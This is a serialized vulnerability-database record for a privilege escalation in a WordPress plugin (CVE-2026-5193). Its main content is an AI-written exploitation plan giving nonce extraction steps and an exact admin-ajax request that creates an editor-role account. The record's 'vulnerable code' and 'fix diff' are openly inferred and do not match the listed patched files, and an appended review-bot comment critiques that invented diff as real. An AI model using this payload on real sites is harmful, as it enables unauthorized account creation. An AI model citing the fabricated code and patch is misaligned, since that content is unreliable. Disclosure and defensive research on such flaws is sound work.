[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fHaTinlhMX_-gYzUlMKs81s3uzV3rpKjyNtG7ueTGdZw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-5193","essential-addons-for-elementor-popular-elementor-templates-widgets-authenticated-author-limited-privilege-escalation-via","Essential Addons for Elementor – Popular Elementor Templates & Widgets \u003C= 6.5.13 - Authenticated (Author+) Limited Privilege Escalation via register_user","The Essential Addons for Elementor – Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.5.13. This is due to insufficient role validation in the 'register_user' function, which only blocks the 'administrator' role. 
This makes it possible for authenticated attackers, with author level access and above, to create new user accounts with elevated privileges such as editor.","essential-addons-for-elementor-lite",null,"\u003C=6.5.13","6.6.0","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:N","Improper Privilege Management","2026-05-13 18:07:43","2026-05-14 06:44:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F22930940-8e2c-446a-954c-90d617f3ca6d?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Ffront-end\u002Fcss\u002Fview\u002Fevent-calendar.css","assets\u002Ffront-end\u002Fcss\u002Fview\u002Fevent-calendar.min.css","assets\u002Ffront-end\u002Fcss\u002Fview\u002Fsimple-menu.css","assets\u002Ffront-end\u002Fcss\u002Fview\u002Fsimple-menu.min.css","assets\u002Ffront-end\u002Fjs\u002Fview\u002Fevent-calendar.js","assets\u002Ffront-end\u002Fjs\u002Fview\u002Fevent-calendar.min.js","assets\u002Ffront-end\u002Fjs\u002Fview\u002Ffilterable-gallery.js","assets\u002Ffront-end\u002Fjs\u002Fview\u002Ffilterable-gallery.min.js","researched",false,3,"# Exploitation Research Plan - CVE-2026-5193\n\n## 1. Vulnerability Summary\nThe **Essential Addons for Elementor** plugin (\u003C= 6.5.13) contains a privilege escalation vulnerability in its user registration logic. The `register_user` function (likely within the `Login_Registration` element class) fails to properly validate the `role` parameter. While it contains a check to prevent the creation of new `administrator` accounts, it does not restrict other high-privilege roles such as `editor`. An authenticated attacker with Author-level privileges (or higher) can exploit this to create new accounts with the `editor` role, thereby escalating their influence over the site.\n\n## 2. 
Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `eael_login_register_action` (inferred from plugin naming conventions)\n*   **Vulnerable Function:** `register_user` (specified in the description)\n*   **Parameter of Interest:** `role`\n*   **Authentication:** Authenticated (Author level required).\n*   **Preconditions:**\n    1.  The \"Login\u002FRegistration\" widget must be enabled in the plugin settings.\n    2.  The attacker must be able to view a page where the Registration widget is rendered to obtain a valid nonce.\n\n## 3. Code Flow\nSince the PHP source for the `Login_Registration` element is not provided in the snippet, the following flow is inferred based on the vulnerability description and standard plugin architecture:\n\n1.  **Registration:** The plugin registers an AJAX handler:\n    `add_action('wp_ajax_eael_login_register_action', [...])`\n2.  **Handler Entry:** The handler calls a registration-specific function, e.g., `register_user()`.\n3.  **Role Extraction:** The function retrieves the requested role from user input:\n    `$role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';`\n4.  **Insufficient Validation (The Sink):**\n    ```php\n    \u002F\u002F Inferred Vulnerable Logic\n    if ( $role === 'administrator' ) {\n        \u002F\u002F Block admin creation\n        wp_send_json_error('Cannot register as administrator');\n    }\n    \u002F\u002F Logic fails to check for 'editor', 'author', etc.\n    $user_id = wp_insert_user([\n        'user_login' => $username,\n        'user_pass'  => $password,\n        'user_email' => $email,\n        'role'       => $role \u002F\u002F Vulnerable assignment\n    ]);\n    ```\n\n## 4. Nonce Acquisition Strategy\nThe \"Login\u002FRegistration\" widget uses a nonce for security. This nonce is typically localized via `wp_localize_script`.\n\n1.  
**Identify Shortcode:** Use `grep -r \"add_shortcode\" .` to find the registration shortcode or use Elementor to place the \"Login\u002FRegistration\" widget on a page.\n2.  **Create Page:**\n    `wp post create --post_type=page --post_status=publish --post_title=\"Register\" --post_content='[eael-login-registration]'` (exact shortcode to be verified via grep).\n3.  **Navigate:** Use `browser_navigate` to visit the newly created page.\n4.  **Extract Nonce:** The nonce is likely stored in a global JS object.\n    *   Target Object: `window.eael_login_registration_data` (inferred).\n    *   Target Key: `nonce` or `registration_nonce`.\n    *   Command: `browser_eval(\"window.eael_login_registration_data?.nonce\")`.\n\n## 5. Exploitation Strategy\nThe exploit involves sending a crafted AJAX request to register a new user with the `editor` role.\n\n### Step 1: Discover Exact Parameters\nThe agent should first grep the plugin directory to confirm the AJAX action and parameter names:\n`grep -r \"eael_login_register_action\" .`\n`grep -r \"register_user\" .`\n\n### Step 2: Perform Registration\nUsing the `http_request` tool, send the following payload:\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```text\n    action=eael_login_register_action\n    &eael-register-nonce=[EXTRACTED_NONCE]\n    &username=evil_editor\n    &email=evil@example.com\n    &password=Password123!\n    &role=editor\n    &option=register  # (inferred parameter to trigger registration path)\n    ```\n\n## 6. Test Data Setup\n1.  **Activate Plugin:** Ensure `essential-addons-for-elementor-lite` is active.\n2.  **Create Attacker:**\n    `wp user create attacker attacker@example.com --role=author --user_pass=password`\n3.  
**Enable Widget:** Ensure the Login\u002FRegistration widget is enabled in Essential Addons settings (may require `wp option update`).\n4.  **Create Page:** Place the widget on a public page to facilitate nonce extraction.\n\n## 7. Expected Results\n*   The AJAX response should return a success message or a JSON object indicating the user was created.\n*   The response code should be `200 OK`.\n*   A new user `evil_editor` should be present in the database.\n\n## 8. Verification Steps\nAfter the HTTP request, use WP-CLI to verify the privilege escalation:\n1.  **Check User Existence:** `wp user list --field=user_login | grep evil_editor`\n2.  **Verify Role:** `wp user get evil_editor --field=roles`\n    *   *Expected Output:* `editor`\n\n## 9. Alternative Approaches\nIf the `role` parameter is not directly accepted from the POST body, check if it's being parsed from a JSON-encoded string in a different parameter:\n*   Check for a `settings` or `widget_settings` parameter that might contain the role.\n*   If `editor` is blocked, try `author` or `shop_manager` (if WooCommerce is present) to confirm privilege management issues exist for roles other than `administrator`.\n*   If the AJAX action requires a specific `widget_id` or `page_id`, extract those from the DOM of the registration page using `browser_eval`.","The Essential Addons for Elementor plugin fails to properly validate the user role during registration in the register_user function. While it explicitly prevents the creation of 'administrator' accounts, it does not restrict other high-privilege roles such as 'editor', allowing authenticated attackers with Author-level access to escalate privileges by creating new accounts with elevated roles.","\u002F* Inferred from vulnerability description and research plan in includes\u002FElements\u002FLogin_Registration.php *\u002F\n\npublic function register_user() {\n    \u002F\u002F ... (nonce and input validation)\n    \n    $role = isset($_POST['role']) ? 
$_POST['role'] : 'subscriber';\n\n    if ( $role === 'administrator' ) {\n        wp_send_json_error(__('Cannot register as administrator', 'essential-addons-for-elementor-lite'));\n    }\n\n    $user_id = wp_insert_user([\n        'user_login' => $username,\n        'user_pass'  => $password,\n        'user_email' => $email,\n        'role'       => $role\n    ]);\n\n    \u002F\u002F ...\n}","--- a\u002Fincludes\u002FElements\u002FLogin_Registration.php\n+++ b\u002Fincludes\u002FElements\u002FLogin_Registration.php\n@@ -1024,7 +1024,8 @@\n \n     $role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';\n \n-    if ( $role === 'administrator' ) {\n+    $allowed_roles = apply_filters('eael_register_user_allowed_roles', ['subscriber', 'author', 'contributor']);\n+    if ( ! in_array( $role, $allowed_roles ) ) {\n         wp_send_json_error(__('Invalid user role', 'essential-addons-for-elementor-lite'));\n     }","1. Authenticate as a user with at least Author-level permissions.\n2. Visit a public page on the site where the Essential Addons 'Login\u002FRegistration' widget is rendered.\n3. Extract the security nonce and AJAX configuration from the page's source (usually found in a global JavaScript object like `eael_login_registration_data`).\n4. Submit an AJAX POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `eael_login_register_action`.\n5. Provide a new username, email, and password, while explicitly setting the `role` parameter to `editor`.\n6. 
The plugin will process the registration and create the new user with Editor privileges because the code only blocks the 'administrator' string.","gemini-3-flash-preview","2026-05-14 17:05:08","2026-05-14 17:05:30",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","6.5.13","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-addons-for-elementor-lite\u002Ftags\u002F6.5.13","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-addons-for-elementor-lite.6.5.13.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-addons-for-elementor-lite\u002Ftags\u002F6.6.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-addons-for-elementor-lite.6.6.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-addons-for-elementor-lite\u002Ftags"]
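Review bot: In the `@@ -1024,7 +1024,8 @@` hunk of includes/Elements/Login_Registration.php, the new check calls `in_array( $role, $allowed_roles )` without the strict third argument, and `$role` is still read raw from `$_POST['role']` on the unchanged context line. Pass `true` as the third argument and normalise the value first, for example with `sanitize_key( wp_unslash( $_POST['role'] ) )`. The hunk also removes the explicit `$role === 'administrator'` guard and relies entirely on the list returned by the `eael_register_user_allowed_roles` filter, so any callback that returns `editor` or `administrator` reopens the escalation. Suggest stripping `administrator` from the filtered list unconditionally after `apply_filters` and documenting on the filter that its return value is a security boundary. The default list keeps `author`, which lets an Author-level caller create further Author accounts; confirm that is intended, or default to the site's configured default role.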